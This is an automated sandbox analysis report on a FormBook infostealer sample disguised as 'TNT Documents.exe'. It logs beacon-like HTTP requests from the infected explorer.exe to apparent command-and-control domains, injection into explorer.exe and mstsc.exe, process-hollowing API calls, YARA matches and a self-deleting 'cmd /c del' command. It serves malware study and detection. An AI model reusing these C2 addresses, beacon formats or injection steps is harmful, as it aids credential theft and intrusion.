Server: openresty/1.19.9.1
Date: Thu, 02 Dec 2021 17:59:37 GMT
Content-Type: text/html
Content-Length: 163
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49820 | 119.18.54.99 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:59:43.047578096 CET | 14603 | OUT | GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.metronixmedical.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:43.231224060 CET | 14603 | IN | HTTP/1.1 302 Found
Date: Thu, 02 Dec 2021 17:59:43 GMT
Server: Apache
Location: https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 74 72 6f 6e 69 78 6d 65 64 69 63 61 6c 2e 63 6f 6d 2f 68 6f 77 36 2f 3f 69 4e 39 74 46 42 3d 65 4f 37 41 4b 35 55 54 53 75 71 54 63 6f 58 41 45 34 4a 4b 50 74 35 74 4f 42 76 36 6e 6e 6d 50 6b 30 4d 32 47 30 49 53 70 49 4f 34 6a 57 77 47 77 48 6c 67 44 77 4d 6e 47 58 42 35 53 66 4b 6f 6c 33 55 65 67 58 43 5a 70 67 3d 3d 26 61 6d 70 3b 34 68 3d 37 6e 5f 44 52 4a 47 78 6e 52 64 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://metronixmedical.com/how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&amp;4h=7n_DRJGxnRd">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49822 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:59:48.300111055 CET | 14611 | OUT | GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.coached.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:48.478606939 CET | 14611 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 02 Dec 2021 17:59:48 GMT
Content-Type: text/html
Content-Length: 275
ETag: "61a4f026-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 18:57:47
Start date: 02/12/2021
Path: C:\Users\user\Desktop\TNT Documents.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\TNT Documents.exe"
Imagebase: 0x70000
File size: 503808 bytes
MD5 hash: F943D9EE79559042BFFF9B4E55270CFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 18:57:59
Start date: 02/12/2021
Path: C:\Users\user\Desktop\TNT Documents.exe
Wow64 process (32bit): false
Commandline: {path}
Imagebase: 0x130000
File size: 503808 bytes
MD5 hash: F943D9EE79559042BFFF9B4E55270CFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 18:58:01
Start date: 02/12/2021
Path: C:\Users\user\Desktop\TNT Documents.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0xaa0000
File size: 503808 bytes
MD5 hash: F943D9EE79559042BFFF9B4E55270CFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 18:58:07
Start date: 02/12/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff662bf0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 18:58:34
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\mstsc.exe
Imagebase: 0xec0000
File size: 3444224 bytes
MD5 hash: 2412003BE253A515C620CE4890F3D8F3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                                                  General

                                                                  Start time:18:58:39
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del "C:\Users\user\Desktop\TNT Documents.exe"
                                                                  Imagebase:0x870000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:18:58:41
                                                                  Start date:02/12/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff673460000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                    Executed Functions

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule

                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 06E7ED0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 33632169688a383f2f403e6117d78918646ae609f6b9cd69b8d5324592009251
                                                                    • Instruction ID: 86447d947ca867f8ca0d677f96e4ba624e2961fa55abd5d37cfc567e9c20fb1d
                                                                    • Opcode Fuzzy Hash: 33632169688a383f2f403e6117d78918646ae609f6b9cd69b8d5324592009251
                                                                    • Instruction Fuzzy Hash: 5B51B0B1D0030DDFDB14CF99C884ADEBBB5BF48314F24812AE919AB214D7B49845CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: c05a66ccc7eb937081cfac65d1e79b2b55bbf11566e228128dea22748c8c48bf
                                                                    • Instruction ID: cb5800ff17f9ea9255efc7262caa862ba34e87aa15f6987df4fc118403862426
                                                                    • Opcode Fuzzy Hash: c05a66ccc7eb937081cfac65d1e79b2b55bbf11566e228128dea22748c8c48bf
                                                                    • Instruction Fuzzy Hash: E151C0B5D00309DFDF14DF99D884ADEBBB5BF48314F24812AE819AB214D7B49945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02366D86,?,?,?,?,?), ref: 02366E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 037ec7e1cf4e113a89c3f04e3e376b2650aff1a5786a7bebd66c8bb9cc642af2
                                                                    • Instruction ID: 079b7fd36336a3bf856ede26c52939e6bb95d09cd5d771558271e30862f45679
                                                                    • Opcode Fuzzy Hash: 037ec7e1cf4e113a89c3f04e3e376b2650aff1a5786a7bebd66c8bb9cc642af2
                                                                    • Instruction Fuzzy Hash: C1414B759002589FCF00CF95D844ADEBBF9EF88320F04846AE914A7350D3759914DFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E7F305
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 7bf7ef6c95a6124903bbd39026b61cf5fe885e617417209b4d332d4748c63e21
                                                                    • Instruction ID: cf183be4556b3eec7e4e3c48d0ccd255b033e7c2212616041137b811140be346
                                                                    • Opcode Fuzzy Hash: 7bf7ef6c95a6124903bbd39026b61cf5fe885e617417209b4d332d4748c63e21
                                                                    • Instruction Fuzzy Hash: 9D21E3B5900359DFCB10CF9AD889BDEBBF4FB48314F14842AE959A3240D774A944CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02366D86,?,?,?,?,?), ref: 02366E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: a865906e7c6af1dceb87d1a1d06b450c9452292e77cad19aa5f5f1252979980d
                                                                    • Instruction ID: 7e75f2d4b648a5c1e50e81650eb50e6e7ff92d13ebd1147cbcfc45f87c8aaf5e
                                                                    • Opcode Fuzzy Hash: a865906e7c6af1dceb87d1a1d06b450c9452292e77cad19aa5f5f1252979980d
                                                                    • Instruction Fuzzy Hash: 9421E3B5901208DFDB10CFA9D584AEEBBF8FB48724F14841AE918B7310D378A955CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02366D86,?,?,?,?,?), ref: 02366E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 6a961968d361c3c034a82386833d3679e71624e2beaaccb008ff07e5865303ee
                                                                    • Instruction ID: 209cdbcbc8c9bcc72d90813bd04cdaf8051e6fdaf8ffc5cdf8e3cfcd4193dded
                                                                    • Opcode Fuzzy Hash: 6a961968d361c3c034a82386833d3679e71624e2beaaccb008ff07e5865303ee
                                                                    • Instruction Fuzzy Hash: 4F21E5B59002499FDB10CFAAD584AEEBBF8FB48364F14841AE915B3310D379A954CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06E78A43
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 621bbe8a20d6b7290dba8f969c40a4d53da3d74791954d82dfc60669a6eba2f4
                                                                    • Instruction ID: 769ae6eb81522254565e824db670798b87509d2526b414ccf82cff2559dada20
                                                                    • Opcode Fuzzy Hash: 621bbe8a20d6b7290dba8f969c40a4d53da3d74791954d82dfc60669a6eba2f4
                                                                    • Instruction Fuzzy Hash: 2B21D6B59006099FCB50CF9AD488BDEBBF8FB58324F14842AE968A7340D374A545DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E7F067
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: c59f65272b4b42c9c788446a8b34652592d73fa53c3ca22e9730764100f293f0
                                                                    • Instruction ID: 01ffff75a39f608c2905f684d88f23ceb6e13e053227c3ec2f2114f569ea0efc
                                                                    • Opcode Fuzzy Hash: c59f65272b4b42c9c788446a8b34652592d73fa53c3ca22e9730764100f293f0
                                                                    • Instruction Fuzzy Hash: 5321D0B5900359DFCB10CF9AD884ADEBBF4FB48320F14842AE958A3350D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 06E7EF9F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: 0906a83638dbc6f13e09606c726cfe1e9734c5c21ae2ba6bbb9f740da8754cd8
                                                                    • Instruction ID: 4383bbad965626e27ffc1dee34628c495d0b16482ca0e421202cb34e69f7429e
                                                                    • Opcode Fuzzy Hash: 0906a83638dbc6f13e09606c726cfe1e9734c5c21ae2ba6bbb9f740da8754cd8
                                                                    • Instruction Fuzzy Hash: AA2108B1D006199FCB14CF9AD4857DEFBF4BB48224F148169E418B3740D778A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06E78A43
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 7eb1d5658d3e1cbb00949761252465366ee96365582dd84701a9ffda5ead2432
                                                                    • Instruction ID: 81dabecbef3bfd81e481fe71c1580c0cfaa85490bc0227ad28128a255686ee05
                                                                    • Opcode Fuzzy Hash: 7eb1d5658d3e1cbb00949761252465366ee96365582dd84701a9ffda5ead2432
                                                                    • Instruction Fuzzy Hash: 3E21E7B59006099FCB50CF9AD484BDEFBF4FB48324F148429E958A7240D374A545CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236BE89,00000800,00000000,00000000), ref: 0236C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: e7a4269aeafe5e39018693f44cf1c934715d06a9a745fbe0bf7416827c435a98
                                                                    • Instruction ID: d97639f336677f845d5c463ed7b05b6142973672b5b847e965d6b1f1635180cd
                                                                    • Opcode Fuzzy Hash: e7a4269aeafe5e39018693f44cf1c934715d06a9a745fbe0bf7416827c435a98
                                                                    • Instruction Fuzzy Hash: 241117B59002098FDB10CF9AD448BEEFBF8FB48314F14882AD559B7600C375A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236BE89,00000800,00000000,00000000), ref: 0236C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 9308d4eeb10547ccc7bb1ea6371cd0c4c1de0d4c93983acbb695b12820d455ed
                                                                    • Instruction ID: 2a91c852b0193287322bbe3fef1888603c50f4b86290340c48104d598ea9db21
                                                                    • Opcode Fuzzy Hash: 9308d4eeb10547ccc7bb1ea6371cd0c4c1de0d4c93983acbb695b12820d455ed
                                                                    • Instruction Fuzzy Hash: 291114B6900209CFCB10CF99D4887DEFBF9BB48324F14852AD459A7200C375A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0236BBDB), ref: 0236BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: add4d5356d673860d6a276b6f547619717083e5d824f79e61e4f427c068a1e6c
                                                                    • Instruction ID: 998a06bcd83d57420c28c5e161d13c31001247e6103e94593d917940af74cb1f
                                                                    • Opcode Fuzzy Hash: add4d5356d673860d6a276b6f547619717083e5d824f79e61e4f427c068a1e6c
                                                                    • Instruction Fuzzy Hash: 9D1123B58006498FCB10CF9AD448BEEFBF9EF48228F14842AD919B7600D374A545CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E7F123
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: e01733605bce3545f80edfccfee4d16a02cf170bbcb4e8f04d67db09af62db54
                                                                    • Instruction ID: 52b7295eeb897b8b6a16793c9dcf55c3a31fc107f17188b50d6c072cc0afd362
                                                                    • Opcode Fuzzy Hash: e01733605bce3545f80edfccfee4d16a02cf170bbcb4e8f04d67db09af62db54
                                                                    • Instruction Fuzzy Hash: C411E0B5900649DFCB10CF9AD888BDEBBF8FB48324F148429E569A7210D775A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E7F7AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 2a72a846ca2af5e4e6b3300fd82ed242466c87877ae81ffda2ef491e58f46712
                                                                    • Instruction ID: 7ca4ef73791d29f1e49d52eef521a00e680f845a1d9a802582f0bd41a5f09687
                                                                    • Opcode Fuzzy Hash: 2a72a846ca2af5e4e6b3300fd82ed242466c87877ae81ffda2ef491e58f46712
                                                                    • Instruction Fuzzy Hash: 7C11F2B58003099FDB50CF99D888BDEBBF8FB48324F14841AE959A7240D3B4A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
